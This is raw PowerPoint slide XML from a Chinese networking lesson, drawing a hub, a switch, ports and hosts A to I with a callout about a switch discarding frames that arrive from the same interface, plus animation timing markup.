            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="仿宋_GB2312"/>
              <a:cs typeface="仿宋_GB2312"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17424" name="Picture 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6038" y="33401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0" name="Object 6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1692275" y="3789363"/>
          <a:ext cx="409575" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s641503" name="Clip" r:id="rId2" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId2" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64150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78936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7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4259263" y="3800475"/>
          <a:ext cx="409575" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s641504" name="Clip" r:id="rId4" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="408940" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64150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263" y="3800475"/>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8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5032375" y="3759200"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s641505" name="Clip" r:id="rId6" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64150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37592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9"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2319338" y="3811588"/>
          <a:ext cx="407987" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s641506" name="Clip" r:id="rId8" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId8" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64150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9338" y="38115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25"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3875" y="33480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4238" y="3338513"/>
            <a:ext cx="457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4" name="Object 12"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3213100" y="3662363"/>
          <a:ext cx="407988" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s641507" name="Clip" r:id="rId12" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId12" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64150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3100" y="366236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5" name="Object 13"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3627438" y="4094163"/>
          <a:ext cx="407987" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s641508" name="Clip" r:id="rId14" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId14" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64150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4094163"/>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6" name="Object 14"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6418263" y="3633788"/>
          <a:ext cx="407987" cy="319087"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s641509" name="Clip" r:id="rId16" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId16" imgW="407670" imgH="318770" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64150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18263" y="3633788"/>
                        <a:ext cx="407987"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7" name="Object 15"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5702300" y="3967163"/>
          <a:ext cx="407988" cy="320675"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s641510" name="Clip" r:id="rId18" imgW="407670" imgH="320675" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId18" imgW="407670" imgH="320675" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64150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300" y="3967163"/>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8" name="Object 16"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1276350" y="3355975"/>
          <a:ext cx="407988" cy="319088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s641511" name="Clip" r:id="rId20" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId20" imgW="342900" imgH="260985" progId="MS_ClipArt_Gallery.2">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="图片 64151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76350" y="3355975"/>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27" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1633538" y="3503613"/>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28" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2000250" y="3546475"/>
            <a:ext cx="258763" cy="2841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29" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2398713" y="3573463"/>
            <a:ext cx="68262" cy="265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0" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3581400" y="3538538"/>
            <a:ext cx="328613" cy="195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1" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3878263" y="3556000"/>
            <a:ext cx="120650" cy="528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2" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4168775" y="3503613"/>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3" name="Line 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5381625" y="3573463"/>
            <a:ext cx="406400"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4" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5857875" y="3546475"/>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5" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5976938" y="3476625"/>
            <a:ext cx="487362"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7436" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3905250" y="2176463"/>
            <a:ext cx="509588" cy="252412"/>
            <a:chOff x="2460" y="1371"/>
            <a:chExt cx="321" cy="159"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17470" name="Line 27"/>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7471" name="Picture 28"/>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72" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2576" y="1407"/>
              <a:ext cx="84" cy="62"/>
              <a:chOff x="2576" y="1407"/>
              <a:chExt cx="84" cy="62"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17473" name="Line 30"/>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74" name="Line 31"/>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7437" name="Line 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2389188" y="2409825"/>
            <a:ext cx="1581150" cy="9699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8" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4117975" y="2401888"/>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39" name="Line 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4265613" y="2357438"/>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40" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2530475" y="3244850"/>
            <a:ext cx="582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7441" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4252913" y="32019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7442" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6069013" y="3151188"/>
            <a:ext cx="569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hub</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17443" name="Rectangle 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4368800" y="2016125"/>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switch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17444" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="965200" y="33035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A</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17445" name="Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1646238" y="4076700"/>
            <a:ext cx="328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B</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17446" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2303463" y="4089400"/>
            <a:ext cx="32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C</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17447" name="Rectangle 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3114675" y="39100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D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17448" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3990975" y="4167188"/>
            <a:ext cx="327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E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17449" name="Rectangle 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4633913" y="3883025"/>
            <a:ext cx="322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F</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17450" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5175250" y="4025900"/>
            <a:ext cx="33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G</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17451" name="Rectangle 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6038850" y="41021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H</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17452" name="Rectangle 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6784975" y="3548063"/>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I</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17453" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6813550" y="2319338"/>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54" name="Line 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7688263" y="1970088"/>
            <a:ext cx="0" cy="237966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455" name="Rectangle 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7670800" y="1908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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>接口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17456" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7197725" y="2351088"/>
            <a:ext cx="420688"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E</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G</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17457" name="Rectangle 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7777163" y="2349500"/>
            <a:ext cx="33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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17458" name="Rectangle 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3527425" y="22479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1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17459" name="Rectangle 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3848100" y="2532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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17460" name="Rectangle 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4273550" y="24923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b="1"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17461" name="Rectangle 56"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6534150" y="1911350"/>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413753" name="Line 57"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1698625" y="3395663"/>
            <a:ext cx="493713" cy="0"/>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3754" name="Line 58"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2424113" y="2395538"/>
            <a:ext cx="1365250" cy="85566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59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1800225" y="3513138"/>
            <a:ext cx="741363" cy="303212"/>
            <a:chOff x="1134" y="2213"/>
            <a:chExt cx="467" cy="191"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17468" name="Line 60"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1134" y="2230"/>
              <a:ext cx="210" cy="174"/>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69" name="Line 61"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1573" y="2213"/>
              <a:ext cx="28" cy="182"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="571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13758" name="Line 62"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4456113" y="2036763"/>
            <a:ext cx="2046287" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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3759" name="Rectangle 63"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7140575" y="2763838"/>
            <a:ext cx="1117600" cy="363537"/>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413760" name="AutoShape 64"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4122738" y="841375"/>
            <a:ext cx="2105025" cy="928688"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -43667"/>
              <a:gd name="adj2" fmla="val 91880"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>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400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="仿宋_GB2312"/>
                <a:cs typeface="仿宋_GB2312"/>
              </a:rPr>
              <a:t>丢弃相同接口的数据帧</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ea typeface="仿宋_GB2312"/>
              <a:cs typeface="仿宋_GB231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3753"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4137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3754"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4137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3758"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41375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37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37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13700">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41370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37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3700">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
